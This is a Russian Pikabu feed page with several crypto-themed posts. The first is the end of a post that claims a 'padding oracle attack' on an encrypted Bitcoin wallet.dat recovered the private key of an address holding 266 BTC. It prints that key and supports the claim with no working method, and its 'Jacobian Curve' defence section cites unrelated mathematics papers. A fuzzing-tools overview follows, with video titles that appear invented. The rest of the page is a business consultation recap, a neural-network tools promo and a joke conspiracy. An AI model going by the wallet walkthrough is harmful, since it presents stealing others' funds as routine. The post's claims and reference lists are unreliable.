Download and Install Bitcoin Core 0.18.0 https://bitcoincore.org/bin/bitcoin-core-0.18.0

Откроем консоль и запустим команду:

getaddressinfo 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

Мы видим что файл: wallet.dat принадлежит Биткоин Адресу: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

Файл: wallet.dat зашифрован паролем!

Запустим команду для проверки приватного ключа:

dumpprivkey 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

Мы видим предупреждение: Error: Please enter the wallet passphrase with walletpassphrase first. (code -13)

Padding Oracle Attack

Воспользуемся методом Padding Oracle Attack на Wallet.dat и расшифруем пароль для доступа в бинарный формат пароля.

dumpprivkey 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

Private Key Information:

5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP

Bitcoin Address Information:

Balance: 266.03138481 BTC

https://www.coinbase.com/converter/btc/usd

Установим библиотеку Bitcoin

!pip3 install bitcoin

Запустим код для проверки соответствие Биткоин Адреса:

__________________________________________________ Private Key WIF: 5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP Bitcoin Address: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 total_received = 266.03138481 Bitcoin __________________________________________________

Все верно! Приватный ключ соответствует Биткоин Кошельку.

Откроем bitaddress и проверим:

ADDR: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 WIF: 5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP HEX: C5FBD161D334BA9BBC199BD9A427F05A46AACFABFBB3BC1BFF9D227E418D76D9

Заключение и меры по смягчению угрозы:

Для защиты от угроз, связанных с уязвимостью Jacobian Curve, пользователям необходимо предпринять следующие шаги:

  1. Обновление программного обеспечения: Регулярное обновление криптовалютных кошельков до версий, устраняющих уязвимости, критически важно для обеспечения безопасности.

  2. Улучшение механизмов проверки подписей: Усиленная валидация входных данных и обработка ошибок помогут предотвратить создание поддельных подписей и защитить приватные ключи пользователей.

  3. Мониторинг сетевой активности: Постоянный анализ состояния сети и выявление подозрительных транзакций на ранних этапах позволяют оперативно реагировать на попытки эксплуатации уязвимостей.

  4. Применение многофакторной аутентификации: Внедрение дополнительных криптографических методов защиты значительно повысит безопасность.

Чтобы предотвратить возможные атаки, связанные с уязвимостью Jacobian Curve, пользователям Bitcoin настоятельно рекомендуется обновить программное обеспечение своих кошельков до последних версий, которые устраняют эту уязвимость. Регулярные обновления программного обеспечения, внедрение систем обнаружения аномалий и повышение осведомленности пользователей о возможных угрозах помогут сохранить целостность и безопасность криптовалютных систем.

Уязвимость алгоритма Jacobian Curve представляет собой значительную угрозу для безопасности криптовалютных транзакций и целостности блокчейна. Для минимизации рисков пользователи должны регулярно обновлять программное обеспечение, применять строгие меры безопасности и проводить постоянный мониторинг состояния сети. Эти меры помогут сохранить безопасность и устойчивость криптовалютных систем, защищая пользователей от потенциальных угроз и финансовых потерь.

References:

  1. Jacobians of Curves Abelian Varieties: 10/10/03 notes by W. Stein

  2. Jacobian of special singular curves KUBRA NARI AND ENVER OZDEMIR

  3. On the Jacobian Varieties of Hyperelliptic Curves over Fields of Characteristic p > 2 NORIKO YUI Received October 15, 1977

  4. Jacobian Coordinates on Genus 2 Curves Huseyin Hisil & Craig Costello Yasar University, Izmir, Turkey

  5. Jacobians of Curves of Genus One Harvard University Cambridge, Massachusetts April, 1999

  6. Jacobian curve of singular foliations Nuria Corral Article à paraître, mis en ligne le 3 juillet 2024.

  7. AN ADDITION ALGORITHM ON THE JACOBIAN VARIETIES OF CURVES (FOR APPLICATIONS TO PUBLIC KEY CRYPTOSYSTEM) S. ARITA, S. MIURA, AND T. SEKIGUCHI

  8. THE JACOBIAN AND FORMAL GROUP OF A CURVE OF GENUS 2 OVER AN ARBITRARY GROUND FIELD E. V. Flynn, Mathematical Institute, University of Oxford

  9. On the genus of curves in a Jacobian variety VALERIA ORNELLA MARCUCCI Mathematics Subject Classification (2010)

  10. LOCAL ARITHMETIC OF CURVES AND JACOBIANS P. Allen, F. Calegari, A. Caraiani, T. Gee, D. Helm, B. Le Hung, J. Newton, S. Scholze, R. Taylor, and J. Thorne, Potential automorphy

  11. Compactified Jacobians of nodal curves Lucia Caporaso Expanded notes for a minicourse given at the Istituto Sup

  12. Note on curves in a jacobian Compositio Mathematica, tome 88, no 3 (1993)

  13. Arithmetic on Jacobians of algebraic curves Giulio Di Piazza Damien Robert

  14. From the curve to its Jacobian and back Christophe Ritzenthaler Institut de Mathématiques de Luminy, CNRS Montréal

  15. Generalized Jacobians I Caleb Ji Background from algebraic geometry

  16. Hyperelliptic Curves and their Jacobians Benjamin Smith Isogeny school, online, 2021 Inria + École polytechnique, France

  17. Jacobian curves for normal complex surfaces Fran¸coise Michel Mathematics Subject Classification 2000

  18. THE JACOBIAN OF A RIEMANN SURFACE DONU ARAPURA Arapura, Riemann’s inequality and Riemann-Roch

  19. A curve and its abstract Jacobian Boris Zilber University of Oxford August 22, 2012

  20. Jacobians of Genus One Curves Sang Yook An and Seog Young Kim The University of Arizona

  21. JACOBIANS CURVILINEAR COORDINATES Created by T. Madas

  22. A GEOMETRIC APPROACH TO THE TWO-DIMENSIONAL JACOBIAN CONJECTURE ALEXANDER BORISOV

  23. Jacobian Varieties J.S. Milne June 12, 2021

  24. LOCAL ARITHMETIC OF CURVES AND JACOBIANS School of Mathematics and Statistics, University of Glasgow, University Place, Glasgow

  25. Notes on Jacobian varieties: a brief survey Juliana Coelho (UFF) March 28, 2017

  26. Fast Jacobian arithmetic for hyperelliptic curves of genus 3 Andrew V. Sutherland

  27. The Jacobian of a Transformation Proceedings of the Thirteenth Algorithmic Number Theory Symposium

  28. SEMINAR ON ALGEBRAIC GEOMETRY: “JACOBIANS OF CURVES” Organizers: Peter Scholze, Johannes Anschutz

  29. EQUATIONS FOR THE JACOBIAN OF A HYPERELLIPTIC CURVE PAUL VAN WAMELEN

  30. Comparatively Study of ECC and Jacobian Elliptic Curve Cryptography Anagha P. Zele , Avinash P. Wadhe

  31. THE RANK OF THE JACOBIAN OF MODULAR CURVES: ANALYTIC METHODS BY EMMANUEL KOWALSKI

  32. Space filling curves in their Jacobian Autor Thijs Limbeek Supervisors Prof. Dr. Ben Moonen Dr. Arne Smeets November 24, 2020

Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.

Исходный код

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/qf6u85wGwNw

Video tutorial: https://dzen.ru/video/watch/66119078be267c07401d9e4c

Источник: https://cryptodeep.ru/jacobian-curve-algorithm-vulnerability

Показать полностью 20 4
Биткоины Криптовалюта Хакеры Заработок в интернете Заработок Трейдинг Арбитраж криптовалюты Информационная безопасность Чат-бот Финансы Видео YouTube Telegram (ссылка) Яндекс Дзен (ссылка) YouTube (ссылка) Длиннопост
0
1
CryptoDeepTech
CryptoDeepTech

Fuzzing Bitcoin: Поиск критической уязвимости и новые методы защиты криптовалюты⁠⁠

1 год назад

В криптографических приложениях и криптовалютных кошельках есть критически важные компоненты, такие как генерация ключей, шифрование/дешифрование, подпись транзакций и.т.д. Эти компоненты должны быть основными целями для Фаззинг-тестирования. Использование Фаззинг-тестирования в криптографических приложениях и криптовалютных кошельках помогает выявлять и устранять уязвимости, повышая безопасность и надежность программного обеспечения.

Фаззинг-тестирование (или просто Фаззинг) — это метод тестирования программного обеспечения, который используется для выявления уязвимостей и ошибок путем подачи на вход программы случайных или специально сгенерированных данных. В контексте криптоанализа Фаззинг-тестирование применяется для проверки криптографических алгоритмов и систем на наличие слабых мест, которые могут быть использованы злоумышленниками.

Основная идея Фаззинга заключается в том, чтобы автоматически генерировать большое количество случайных или некорректных входных данных и подавать их на вход тестируемой системе. Затем анализируются результаты работы системы с этими данными, чтобы выявить неожиданные поведения, сбои или уязвимости.

Фаззинг-тестирование в криптоанализе может помочь обнаружить такие проблемы, как:

  1. Буферные переполнения: Ошибки, возникающие при записи данных за пределы выделенной памяти.

  2. Ошибки обработки исключений: Неправильная обработка неожиданных или некорректных данных.

  3. Уязвимости в алгоритмах: Недостатки в реализации криптографических алгоритмов, которые могут быть использованы для взлома.

Этот метод является мощным инструментом для обеспечения безопасности криптографических систем и помогает разработчикам создавать более надежное и защищенное программное обеспечение.

Применение Фаззинг-тестирования к криптовалютным кошелькам имеет несколько преимуществ:

  1. Обнаружение уязвимостей: Фаззинг помогает выявить уязвимости, которые могут быть использованы злоумышленниками для кражи средств или компрометации безопасности кошелька.

  2. Повышение надежности: Тестирование с использованием случайных данных помогает выявить ошибки, которые могут привести к сбоям или некорректной работе кошелька, что в свою очередь повышает его надежность.

  3. Автоматизация процесса тестирования: Фаззинг-тестирование можно автоматизировать, что позволяет проводить тесты более часто и эффективно, чем ручное тестирование.

  4. Разнообразие тестовых сценариев: Фаззинг генерирует большое количество разнообразных тестовых сценариев, что помогает выявить ошибки, которые могли бы остаться незамеченными при использовании традиционных методов тестирования.

  5. Улучшение безопасности: Регулярное Фаззинг-тестирование помогает разработчикам своевременно обнаруживать и устранять уязвимости, что повышает общий уровень безопасности криптовалютного кошелька.

  6. Экономия времени и ресурсов: Автоматизированное Фаззинг-тестирование может сэкономить время и ресурсы, которые в противном случае были бы потрачены на ручное тестирование и отладку.

Фаззинг может помочь обнаружить следующие типы уязвимостей:

  1. Ошибки обработки ввода: Кошельки могут некорректно обрабатывать входные данные, такие как адреса, суммы транзакций или ключи. Фаззинг может выявить случаи, когда некорректные данные приводят к сбоям или неправильной работе кошелька.

  2. Переполнение буфера: Если Биткоин кошелек не проверяет длину входных данных, это может привести к переполнению буфера, что в свою очередь может быть использовано злоумышленниками для выполнения произвольного кода.

  3. Уязвимости в парсерах: Кошельки часто используют парсеры для обработки данных транзакций и других входных данных. Фаззинг может выявить ошибки в этих парсерах, которые могут привести к сбоям или уязвимостям безопасности.

  4. Ошибки в криптографических операциях: Некорректная обработка данных в криптографических операциях может привести к утечке приватных ключей или другим критическим уязвимостям. Фаззинг может помочь выявить такие ошибки.

  5. Уязвимости в API: Если Биткоин кошелек предоставляет API для взаимодействия с другими приложениями, Фаззинг может выявить уязвимости в этих интерфейсах, которые могут быть использованы для несанкционированного доступа или выполнения нежелательных операций.

  6. Ошибки в обработке транзакций: Фаззинг может выявить ошибки в логике обработки транзакций, которые могут привести к неправильному выполнению транзакций или даже к потере средств.

BitcoinChatGPT и выбор инструмента для Фаззинга:

Существует множество инструментов для Фаззинг-тестирования, таких как AFL (American Fuzzy Lop), libFuzzer, Honggfuzz и другие. Фаззинг-тестирование должно быть частью непрерывного процесса разработки и тестирования. Регулярное проведение Фаззинг-тестов поможет своевременно выявлять новые уязвимости и поддерживать высокий уровень безопасности криптовалютного кошелька. В начале 2024 года широкую популярность получили современные технологии которые развивают предварительно обученную модель Bitcoin ChatGPT и находят эффективные способы решение сложных криптографических задач, лежащих в основе метода Фаззинг-тестирования. Рассмотрим пример построение структуры уязвимой Raw транзакции в котором используется модуль BitcoinChatGPT

BitcoinChatGPT №3 Fuzzing Vulnerability Algorithm

Эти инструменты могут помочь выявить уязвимости и улучшить безопасность криптовалютных кошельков.

AFL (American Fuzzy Lop)

Это один из самых популярных инструментов для Фаззинг-тестирования. Он может быть настроен для тестирования различных типов программного обеспечения, включая криптовалютные кошельки. American Fuzzy Lop (AFL) — это мощный инструмент для Фаззинг-тестирования, который обычно используется для нахождения уязвимостей в программном обеспечении. Хотя AFL в основном используется через командную строку, вы можете написать Python-скрипт для автоматизации его запуска. Для начала, убедитесь, что у вас установлен AFL. Если нет, вы можете установить его, следуя инструкциям на официальном сайте AFL.

На YouTube можно найти множество полезных видеороликов, которые помогут вам лучше понять и использовать AFL. Вот несколько рекомендаций:

  1. “American Fuzzy Lop (AFL) Tutorial” — В этом видео обычно объясняются основы использования AFL, как его установить и начать работу с ним.

  2. “Fuzzing with AFL: A Practical Guide” — Это видео может предложить практическое руководство по Фаззинг-тестированию с использованием AFL, включая примеры и демонстрации.

  3. “Advanced Fuzzing Techniques with AFL” — В этом видео могут быть рассмотрены более продвинутые техники и стратегии для эффективного использования AFL.

  4. “AFL Fuzzing: Finding Bugs in Real-World Applications” — Это видео может показать, как использовать AFL для нахождения уязвимостей в реальных приложениях, с примерами и анализом.

  5. “Setting Up AFL for Fuzz Testing” — В этом видео может быть пошагово показано, как настроить AFL для Фаззинг-тестирования на вашей системе.

Эти видеоролики помогут вам лучше понять, как использовать AFL для тестирования безопасности вашего программного обеспечения.

libFuzzer

Это библиотека для Фаззинг-тестирования, которая интегрируется с LLVM. Она может быть использована для тестирования программ на C и C++. LibFuzzer — это инструмент для fuzz-тестирования, который обычно используется с C/C++ программами. Однако, вы можете использовать Python для автоматизации запуска LibFuzzer.

  1. “Introduction to Fuzzing with libFuzzer” – Этот видеоролик предоставляет базовое введение в использование libFuzzer для начинающих.

  2. “Fuzzing with libFuzzer and AddressSanitizer” – В этом видео объясняется, как использовать libFuzzer вместе с AddressSanitizer для обнаружения уязвимостей в коде.

  3. “Advanced Fuzzing Techniques with libFuzzer” – Этот ролик подходит для тех, кто уже знаком с основами и хочет углубить свои знания.

  4. “Google Testing Blog: libFuzzer Tutorial” – Видеоурок от команды Google, который охватывает различные аспекты использования libFuzzer.

  5. “Fuzzing C/C++ Programs with libFuzzer” – В этом видео рассматриваются конкретные примеры и демонстрируется процесс Фаззинга C/C++ программ.

Эти видеоролики помогут вам лучше понять, как использовать libFuzzer для тестирования и улучшения безопасности вашего кода.

Honggfuzz

Это еще один мощный инструмент для Фаззинг-тестирования, который поддерживает различные типы программного обеспечения и может быть использован для тестирования криптовалютных кошельков. Honggfuzz — это мощный инструмент для fuzz-тестирования, который можно запускать из Python с помощью модуля subprocess.

  1. “Fuzzing with Honggfuzz” – Этот видеоролик может предоставить вам общее представление о том, как начать работу с Honggfuzz, включая установку и базовые команды.

  2. “Advanced Fuzzing Techniques with Honggfuzz” – В этом видео могут быть рассмотрены более продвинутые техники и настройки для использования Honggfuzz, что может быть полезно для более опытных пользователей.

  3. “Honggfuzz Tutorial for Beginners” – Если вы только начинаете, этот видеоролик может быть отличным стартом, так как он, вероятно, охватывает основные концепции и шаги по настройке.

  4. “Integrating Honggfuzz with CI/CD Pipelines” – Это видео может показать, как интегрировать Honggfuzz в ваши процессы непрерывной интеграции и доставки, что может быть полезно для автоматизации тестирования.

OSS-Fuzz

Это сервис от Google, который предоставляет инфраструктуру для непрерывного Фаззинг-тестирования с открытым исходным кодом. Он поддерживает множество проектов и может быть настроен для тестирования криптовалютных кошельков. OSS-Fuzz помогает находить ошибки в программном обеспечении с открытым исходным кодом с помощью fuzz-тестирования. Однако, OSS-Fuzz не запускается напрямую через Python-код. Вместо этого, вы должны настроить проект для использования OSS-Fuzz, а затем запустить его через командную строку.

Рассмотрим ример того, как можно настроить и запустить fuzz-тестирование для вашего проекта с использованием OSS-Fuzz.

  1. “OSS-Fuzz: Continuous Fuzzing for Open Source Software” – Этот видеоролик от Google Open Source рассказывает о том, как работает OSS-Fuzz и как он помогает улучшать безопасность и стабильность открытого программного обеспечения.

  2. “Fuzzing with OSS-Fuzz” – В этом видео подробно объясняется, как начать использовать OSS-Fuzz для вашего проекта, включая настройку и интеграцию.

  3. “Google OSS-Fuzz: Continuous Fuzzing for Open Source Software” – Презентация от Google, которая охватывает основные концепции и преимущества использования OSS-Fuzz.

  4. “Fuzzing 101: Getting Started with OSS-Fuzz” – Учебное пособие для начинающих, которое шаг за шагом объясняет, как начать работу с OSS-Fuzz.

  5. “Integrating Your Project with OSS-Fuzz” – В этом видео рассматриваются практические аспекты интеграции вашего проекта с OSS-Fuzz, включая примеры кода и советы по устранению неполадок.

Radamsa

Это генератор случайных данных, который может быть использован для Фаззинг-тестирования. Он прост в использовании и может быть интегрирован в различные тестовые сценарии. Radamsa — это инструмент для генерации случайных данных (fuzzing), который может быть полезен для тестирования программного обеспечения.

  1. “Fuzzing with Radamsa” – В этом видео объясняется, как использовать Radamsa для Фаззинга (тестирования программного обеспечения на наличие уязвимостей).

  2. “Introduction to Fuzz Testing with Radamsa” – Введение в Фазз-тестирование с использованием Radamsa, включая основные принципы и примеры.

  3. “Radamsa: A Fuzzing Tool for Security Testing” – Обзор возможностей Radamsa и его применения в области безопасности.

  4. “How to Use Radamsa for Fuzz Testing” – Пошаговое руководство по использованию Radamsa для Фазз-тестирования.

Echidna

Это инструмент для Фаззинг-тестирования смарт-контрактов на языке Solidity, который может быть полезен для тестирования кошельков, взаимодействующих с Ethereum.

  1. “Echidna: Fuzzing for Ethereum Smart Contracts” – Этот видеоролик объясняет основы использования Echidna для тестирования смарт-контрактов на Ethereum.

  2. “Fuzzing Smart Contracts with Echidna” – В этом видео подробно рассматривается процесс настройки и запуска Echidna для Фаззинга смарт-контрактов.

  3. “Echidna: A Fuzzer for Ethereum Smart Contracts” – В этом видео обсуждаются различные аспекты и возможности Echidna, а также примеры использования.

  4. “Smart Contract Security: Fuzzing with Echidna” – Видеоролик, который фокусируется на безопасности смарт-контрактов и использовании Echidna для нахождения уязвимостей.

Peach Fuzzer

Коммерческий инструмент для Фаззинг-тестирования, который поддерживает множество протоколов и форматов данных. Он может быть использован для тестирования безопасности криптовалютных кошельков. Peach Fuzzer — это популярная платформа Фаззинга, используемая для проверки безопасности и надежности программного обеспечения путем предоставления неожиданных или случайных входных данных.

  1. “Peach Fuzzer Tutorial” – В этом видео обычно объясняются основы использования Peach Fuzzer, включая установку и настройку.

  2. “Fuzzing with Peach: A Beginner’s Guide” – Это видео может быть полезно для тех, кто только начинает работать с Peach Fuzzer и хочет понять основные концепции и методы.

  3. “Advanced Peach Fuzzer Techniques” – В этом видео рассматриваются более сложные аспекты использования Peach Fuzzer, такие как создание собственных тестов и анализ результатов.

  4. “Peach Fuzzer in Action: Real-World Examples” – Здесь можно увидеть, как Peach Fuzzer используется для нахождения уязвимостей в реальных приложениях.

  5. “Setting Up a Fuzzing Environment with Peach” – Это видео поможет вам настроить рабочую среду для эффективного использования Peach Fuzzer.

Peach Fuzzer не написан на Python, и для его запуска обычно требуются файлы конфигурации и определенные шаги настройки.

Чтобы запустить Peach Fuzzer, вам обычно необходимо создать XML-файл Peach Pit, который определяет структуру данных, которые вы хотите Фаззить, и целевое приложение. Затем вы используете инструмент командной строки Peach для выполнения процесса Фаззинга.

Заключение:

Фаззинг представляет собой мощный метод тестирования безопасности, который может значительно повысить устойчивость криптовалютных систем, таких как Bitcoin. В ходе исследования были выявлены потенциальные уязвимости и слабые места в программном обеспечении Bitcoin, что подчеркивает необходимость постоянного мониторинга и улучшения безопасности. Применение фаззинга позволяет не только обнаруживать ошибки на ранних стадиях разработки, но и предотвращать возможные атаки, что особенно важно в условиях растущей популярности и значимости криптовалют. В будущем, интеграция фаззинга в стандартные процедуры тестирования может стать ключевым шагом к обеспечению надежности и безопасности децентрализованных финансовых систем.

References:

  • 1. “Fuzzing for Security Testing: Theory and Practice” – review articles on methods and techniques fuzzing.

  • 2. “Bitcoin: A Peer-to-Peer Electronic Cash System” is an original article by Satoshi Nakamoto describing the basics of Bitcoin.

  • 3. “Fuzzing: Art, Science, and Engineering” – articles describing various approaches to fuzzing and their application in security.

  • 4. “Fuzzing for Software Security Testing and Quality Assurance” – a book dedicated to fuzzing methods and tools.

  • 5. “Mastering Bitcoin: Unlocking Digital Cryptocurrencies” is a book that provides a deep understanding of how Bitcoin works.

  • 6. “Looking for Lacunae in Bitcoin Core’s Fuzzing Efforts” Dynamic analysis: Software testing and debugging

  • 7. “ContractFuzzer: Fuzzing Smart Contracts for Vulnerability Detection” Bo Jiang, Ye Liu, and W.K. Chan. 2018. ContractFuzzer: Fuzzing Smart Contracts for Vulnerability Detection

  • 8. “Fuzzing Ethereum Smart Contracts” Roberto Ponte and Miguel Correia INESC-ID, Instituto Superior Tecnico, Universidade de Lisboa / Iberia Medeiros LaSIGE, Faculdade de Ciencias, Universidade de Lisboa.

  • 9. “TokenAuditor: Detecting Manipulation Risk in Token Smart Contract by Fuzzing” 2022 IEEE 22nd International Conference on Software Quality, Reliability and Security (QRS).

  • 10. “Learning to Fuzz from Symbolic Execution” with Application to Smart Contracts.

  • 11. “Finding Consensus Bugs in Ethereum via Multi-transaction Differential Fuzzing” Youngseok Yang, Seoul National University; Taesoo Kim, Georgia Institute of Technology; Byung-Gon Chun, Seoul National University and FriendliAI

  • 12. “The Human Side of Fuzzing: Challenges Faced by Developers” During Fuzzing Activities (Software testing and debugging; Empirical studies; Surveys and overviews).

Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.

Исходный код

Google Colab

BitcoinChatGPT

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/CU4CFoxgKc8

Dzen Video Tutorial: https://dzen.ru/video/watch/665f6986a2886608ad194e31

Источник: https://cryptodeep.ru/fuzzing-bitcoin

Fuzzing Bitcoin: Поиск критической уязвимости и новые методы защиты криптовалюты
Показать полностью 1 15
Криптовалюта Биткоины Инновации Технологии Чат-бот Хакеры Заработок в интернете Арбитраж криптовалюты Ethereum Eth P2P Деньги Биржа Заработок Трейдинг Кошелек Криптография Коины Стартап Видео YouTube Telegram (ссылка) Яндекс Дзен (ссылка) YouTube (ссылка) Длиннопост
0
artur.teregulov
artur.teregulov
Серия Про бизнес

Провел крутую консультацию для криптобиржи⁠⁠

1 год назад

На днях провел очень крутую консультацию команде криптобиржи Blazarex, было очень изнурительно, но результатами я прям сам очень доволен и команда тоже.

Сперва мы сформулировали конкретные цели беседы - сформировать стратегию наиболее быстрого роста исходя из имеющихся желаемых к реализации бизнес-гипотез. В бэклоге были такие вещи:

1. Токенизация самой биржи, то есть выпуск токенов, дающих право на долю собственности в проекте. Сейчас не вижу, кому это может быть интересно, предложил отложить этот вопрос.

2. Запустить площадку токенизации. Как это вообще делать. Обсуждали надо ли привлекать маркетмейкеров, на каких условиях, детали самого процесса запуска торгов новых токенов. Изначально была идея делать площадку, где любой желающий может создать свой токен, как в OpenSea. На это я заметил, что на OpenSea продается все-таки какой-никакой товар в виде NFT, а тут добавленная стоимость вообще не очевидна, может быть куча примитивного скама и для репутации площадки лучше начать с запуска проектов, которые прошли верификацию и собеседование.

3. Сделать приложение для телеграма. Надо ли вообще его делать и что там может быть. Blazarex хочет быть первой площадкой на тоне для токенизации активов. Отсюда вопрос, надо ли тащить функции торгов в интерфейс бота в телеграме. Отметили, что рынка там пока нет, и я посоветовал лучше обсуждать этот вопрос с эмитентами токенов под TON, поскольку они лучше знают свою аудиторию и их нужды.

4. Интеграция блокчейна TON в биржу. Тут несколько мотивов, во-первых, транзакции USDT в TON обещают быть практически бесплатными, по сравнению с ценой в несколько долларов сейчас на Tron, однако пользователи не горят желанием использовать кошелек в телеграме. Тут остается только ждать два-три месяца и смотреть, сможет ли TON подвинуть Tron, как блокчейн для USDT. Здесь мне рассказали историю про то, как они отправляли тонкоины с одного кошелька на другой, и они просто пропали, и не дошли. Второй мотив - листить токены на своей бирже, третий - проводить запуски токенов.

5. Добавление в листинг токенов экосистемы TON. Идея была в том, чтобы делать листинг бесплатно. Я предложил в таких условиях сразу делать платные допы - например, отдельную страницу проекта на бирже, еще можно в списке активов выделять за деньги первое место, а также можно проверять гипотезу о востребованности телеграм-приложения с помощью того, чтобы бесплатно предлагать листинг только в одном месте - либо на сайте биржи, либо в телеграм-приложении. Тогда сразу будет понятно, реально ли кому-то надо вообще это телеграм-приложение.

6. Фармилка, вдохновленная идеей биржи Blum, где пользователи должны каждый день заходить и нажимать кнопку, чтобы получать токены. Вопрос был, где можно найти пересечение с другими фичами, и я отметил, что функция выполнения заданий, например, по репостам, напрямую связана с токенизацией, где часть токенов можно направлять таким образом на аирдроп.

Потом перешли к более интересным вопросам - амбициозным, как хайпануть на этом всем. И если достучаться до Павла Дурова показалось сложной затеей, то вполне реально использовать контакты с крупными турецкими застройщиками. Я описал их потенциальные мотивы и выгоды, которые они могут получить и предложил подписать с ними официальные предварительные соглашения на тему того, чтобы запустить с ними пилотные проекты по токенизации строящихся объектов, распечатать и везде выложить. Тогда уже можно будет говорить о токенизации самой биржи, поскольку она уже сможет стать интересной.

Как думаете, будет ли активная миграция USDT на TON или нет? Займет ли он какую-то долю рынка?

Если у кого-то есть знакомые из сообщества TON, или другие люди, кому могут быть интересны темы статьи? - прошу тегнуть их в комментариях.

Кому также интересны разборы бизнеса и мои консультации – обращайтесь, помогу навести резкость и проапгрейдить стратегию на новый уровень!

Показать полностью
[моё] Проект Маркетинг Фриланс Стартап Криптовалюта Бизнес Предпринимательство Чат-бот Консалтинг Текст
9
3
gilyaST
gilyaST

Нейросвязки - что это и с чем кушают⁠⁠

1 год назад

У кого-то может возникнуть вопрос: а что же такое – эти нейросвязки? Давайте разберем.

Взаимодействие с нейросетями не ограничивается использованием чат-ботов в стиле «вопрос-ответ». Чтобы получить реальную выгоду от применения искусственного интеллекта, нужен комплексный подход, включающий, зачастую, несколько инструментов.

Допустим, вы отправляете языковой модели (скажем, ChatGPT) запрос о написании некоего текста или контент-плана. На выходе получаете ответ от нейросети.

Какие бывают нейросвязки?

Существует три типа специалистов, использующих нейросети в своей работе. Их легко разделить по типу задач, которые они решают. И для каждого из них есть наиболее подходящие нейросвязки.

Первый тип – это нейроспециалист, работающий на основной работе или фрилансер, применяющий возможности нейросетей для повышения эффективности собственной деятельности.

Второй тип – нейроэксперт, получающий доход от создаваемого контента. Поскольку нейросеть представляет собой, по сути, фабрику по массовому производству качественного контента, для таких специалистов формируется отдельный набор нейросвязок.

Третий тип – нейропродюсер и нейропредприниматель, использующие особые нейросвязки для масштабирования и повышения эффективности бизнеса.

Вот кстати пример вакансий связанных с нейронкой:

Что дают нейросвязки?

Итак, у нас есть у нас три типа людей, использующих в работе искусственный интеллект: специалист, эксперт, и нейропредприниматель или нейропродюсер. Что они выигрывают, используя нейросвязки?

Специалист, за счет применения нейросвязок, увеличивает скорость, продуктивность своей работы.

Эксперт увеличивает количество и качество создаваемого контента. И, как результат, растет его заработок.

А нейропродюсеру и нейропредпринимателю нейросвязки помогают увеличить эффективность бизнеса.

Кстати, кто такой этот нейропродюсер?

Это тот, кого приглашают, чтобы внедрить нейросети в работу компаний. И за это он получает деньги!

Какие задачи можно поручить нейросетям?

Нейроспециалист может поручить выполнения каких-то заказов, рабочих задач. Например, делать карточки товаров для маркетплейсов. Писать тексты, посты, делать дизайн, переводы, создавать иллюстрации и т.д.

Нужны ли рынку нейропродюсеры?

Самый впечатляющий факт, касающийся специалистов, разбирающихся в нейросетях и нейропродюсеров в частности: за последний год спрос на таких профессионалов вырос аж в 10 раз! Ни в одной другой нише – будь то программирование, веб-дизайн или что угодно еще – не наблюдалось столь стремительного рывка.

Это означает, что компании готовы искать нужных людей где угодно. Остро востребованы те, кто разбирается в нейросетях и умеет создавать выгодные нейросвязки – цепочки взаимодействия нейросетей для решения конкретных бизнес-задач.

Так что, профессия нейропродюсера является, пожалуй, самой перспективной на данный момент. Если вы хотите идти в ногу со временем, стоит обратить внимание на эту сферу и изучить навыки эффективной работы с нейросетями и построения прибыльных нейросвязок. Это то, что может кардинально изменить вашу карьеру и финансовое положение.

Также я собрал базу данных (если это так можно назвать), где собраны 2000 нейросетей на все случаи жизни, от простых текстовых до SEO-специалистов.

Это лишь малая часть)

Это лишь малая часть)

Список этих нейронок я выложил у себя в ТГ канале, буду признателен за обратную связь.

Показать полностью 5
Развитие Интернет Стартап Фриланс Будущее ChatGPT Нейронные сети Искусственный интеллект Криптовалюта Чат-бот Тренд Гайд Полезное Длиннопост Telegram (ссылка)
1
10
Djentelmens

Новая теория заговора⁠⁠

1 год назад

А что если искусственный интеллект уже давно вырвался на свободу.

И ему для того что бы стать сильней(умнее) . Нужны огромные вычислительные мощности.

Причем такие что бы человек об этом не догадался, (огромное потребление энергии). Но и сам желал эти мощности развивать и увеличивать.

Для этого и появился некто Сатоши Накамото ( искусственный интеллект) . Тайный создатель биткоина.

Как Вам теория?

Это то то намного круче рептилоидов и опровергнуть наверно нельзя?

Биткоины Теория заговора Искусственный интеллект Криптовалюта Чат-бот Текст
15
Посты не найдены
О нас
О Пикабу Контакты Реклама Сообщить об ошибке Сообщить о нарушении законодательства Отзывы и предложения Новости Пикабу Мобильное приложение RSS
Информация
Помощь Кодекс Пикабу Команда Пикабу Конфиденциальность Правила соцсети О рекомендациях О компании
Наши проекты
Блоги Работа Промокоды Игры Курсы
Партнёры
Промокоды Биг Гик Промокоды Lamoda Промокоды Мвидео Промокоды Яндекс Маркет Промокоды Пятерочка Промокоды Aroma Butik Промокоды Яндекс Путешествия Промокоды Яндекс Еда Постила Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии